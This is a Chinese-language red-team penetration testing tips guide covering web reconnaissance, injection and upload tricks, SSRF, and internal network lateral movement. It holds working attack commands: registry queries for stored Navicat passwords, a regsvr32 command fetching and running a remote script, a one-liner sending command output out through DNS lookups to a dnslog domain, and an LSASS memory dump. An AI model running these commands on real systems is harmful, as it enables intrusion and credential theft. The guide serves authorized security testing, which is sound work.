红队渗透测试技巧全面指南

前言

本文总结了从Web端到内网渗透的全面技巧，涵盖信息收集、漏洞利用、横向移动等关键环节，旨在为安全研究人员提供实用的红队操作指南。

Web端渗透技巧

信息收集

CMS识别

1. 工具识别：使用云溪、Wappalyzer、Fofa及GitHub上的各类banner识别脚本
2. 特征识别：
   • 网站后台、首页的"power by"声明
   • robots.txt文件内容
   • 网站icon特征（如joomla、dede特有图标）
   • 目录框架结构（如wordpress、discuz!的特定结构）
3. 二次开发识别：如onethink基于thinkphp二次开发
4. 报错信息利用：
   • 收集warning/error/not exist等报错关键字
   • 通过Google语法搜索相似源码和函数
5. MSF利用：部分CMS可直接通过Metasploit攻击（如laravel RCE、思科ASA设备漏洞）

端口扫描

• 重点关注端口：
  • 21/22：FTP匿名访问(使用--no-passive参数)、SSH弱口令
  • 81/88/888：常见Web备用端口
  • 389：LDAP默认端口（可能为域控）
  • 445：SMB协议（配合MSF 17010漏洞利用）
  • 999：phpMyAdmin
  • 1234/6379：Redis
  • 3389：RDP（尝试guest、shift后门）
  • 6588：护卫神管理界面
  • 7000-10000：Java服务（关注Weblogic、JBoss、Shiro、Fastjson）

子域名收集

1. 域传送漏洞利用
2. 通过API接口收集
3. 注意子域名可能存在的后台和phpMyAdmin

目录扫描技巧

1. 先使用Burp Suite爬取网站框架
2. 防封禁策略：
   • 降低扫描线程
   • 使用小众扫描器或自写Python脚本
3. 关注上传编辑器（FCK、eWeb等）
4. 敏感文件访问技巧：
   • 路径变形：www.axgg.com/hdx/.hxd/axgg.xml
   • 路径污染：www.axgg.com/hdx/;abcd/hxd/axgg.xml
   • 路径回溯：www.axgg.com/hdx/abcd/../hxd/axgg.xml
5. 源码泄露：.git、.svn还原（使用Kali多种工具尝试）
6. 日志文件分析

其他信息收集

1. C段、旁站（通过Fofa搜索icon、header）
2. 特殊界面：
   • phpinfo（收集路径、真实IP、绕过httponly）
   • phpMyAdmin、Adminer等数据库管理界面
3. 同模板网站搜索
4. 护网场景：收集学号/工号（通过"奖学金&&值班表"等关键词）
5. 401认证绕过：添加X-Custom-IP-Authorization: 127.0.0.1
6. 登录框JS分析：可能暴露WebServices等组件

SQL注入技巧

1. 二次注入：通过图片名注入payload
2. Burp Suite高级利用：
   • GET/POST切换
   • 参数污染
   • 分块传输
   • X-Forwarded-For设为127.0.0.1
   • 修改Content-Type
   • 删除非主流字符
3. WAF绕过：需先分析拦截规则（参考作者前文）
4. 盲注优化：本地搭建相同CMS分析表结构
5. 非传统注入点：如部门选择功能
6. 隐藏回显：检查F12中的hidden属性
7. SQLServer技巧：当xp_cmdshell转义失败时，尝试certutil hex写入

逻辑漏洞

1. 密码修改逻辑漏洞：当无法破解admin hash时尝试
2. 验证码绕过：
   • 万能验证码（0000、8888）
   • 空验证码
   • 删除验证码参数
3. 账号覆盖：注册时尝试"admin[多个空格]"

文件上传

1. 条件竞争：如TP框架session写入
2. 二次渲染：需实际环境复现
3. 白名单绕过：若无解析漏洞则难以绕过
4. 特殊文件利用：如.user.ini

XSS利用

1. 主要用途：窃取cookie、钓鱼
2. 高级利用：Chrome/XMind的XSS上线Cobalt Strike
3. 实际应用：配合弱口令修改模板

SSRF利用

1. 发现技巧：对所有GET/POST参数进行fuzzing
2. 主要用途：
   • 获取真实IP
   • 探测内网文件（通过gopher/file协议）
   • 端口扫描（寻找GET型注入等漏洞）
3. 组合利用：如SSRF+Redis未授权访问

XXE/CSRF

1. XXE检测：修改Content-Type为application/xml观察响应变化
2. CSRF利用：借管理员权限执行操作（如编辑模板插入恶意代码）

内网渗透技巧

信息收集

1. 基础信息：

   • 杀软检测
   • 是否域环境
   • IPC空连接检查：wmic share get name,path,status
   • 共享文件搜索：dir /b /s *.txt
   • 桌面文件定位（通过注册表）：reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /s

2. 敏感软件信息：

   • Navicat密码提取：

     reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
     reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
     reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
     

   • WiFi密码、浏览器凭证、RDP凭证
   • Public\Document目录检查

3. 网络环境：

   • C段Web资源
   • 数据库位置
   • 信任域（域环境下）

横向移动

1. 基于信息收集结果：
   • 通过数据库凭证横向
   • IPC空连接+GPP泄露
   • MS17-010等漏洞利用
2. 避免盲目操作：每台机器都应充分信息收集

提权策略

1. 评估提权必要性：仅当有助于进一步渗透时提权
2. 典型场景：域机器上的本地用户提权后查找域用户

权限维持

1. 评估价值：仅对关键机器（如运维/IT）做持久化
2. 常用方法：
   • 自启动项
   • ACL修改
   • 域内DCSync
   • 键盘记录/SSH劫持(Linux)

文件传输技巧

1. 常规方法：Python/certutil/bitsadmin/wget/curl/ftp
2. 脚本方法：JS/HTA/VBS脚本下载
3. 编译方法：使用csc编译download.cs
4. WMI方法：wmic process call create "regsvr32 /s /n /u /i:http://xxxxx:1337/as.txt scrobj.dll"

内网实用技巧

1. 文件访问技巧：
   • 复制后查看：copy 受限文件 可访问位置
2. 中文环境处理：通过bat/vbs脚本绕过字符问题
3. RDP连接问题：
   • mstsc /admin
   • mstsc /console
4. 无回显CMD执行：

   cmd /c whoami > temp && certutil -encode -f temp temp&&FOR /F "eol=- delims=" %i IN (temp) DO (set =%i & cmd /c nslookup %_:~0,-1%. 6utb0b.dnslog.cn)&del temp
   

5. 特殊文件夹创建：echo 123 > axgg::$INDEX_ALLOCATION（MySQL UDF无plugin目录时）
6. 命令绕过：变形命令绕过规则检测
7. OWA信息泄露：
   • 修改HTTP协议为1.0并删除Host头
   • 访问/owa/auth/trace.axd获取版本和代理IP
8. 降权执行：使用runas启动进程
9. LSASS转储替代方法：

   tasklist | findstr lsass.exe
   powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] D:\wwwroot\huodong\lsass.dmp full"
   

高级技巧

1. 免杀技术
2. DLL劫持与注入
3. 委派攻击（适合大型域环境）
4. UAC绕过

资源参考

作者GitHub收集的PoC：https://github.com/xinxin999/Exp-collect

注：本文为技术研究文档，所有技术仅供合法授权测试使用，禁止用于非法用途。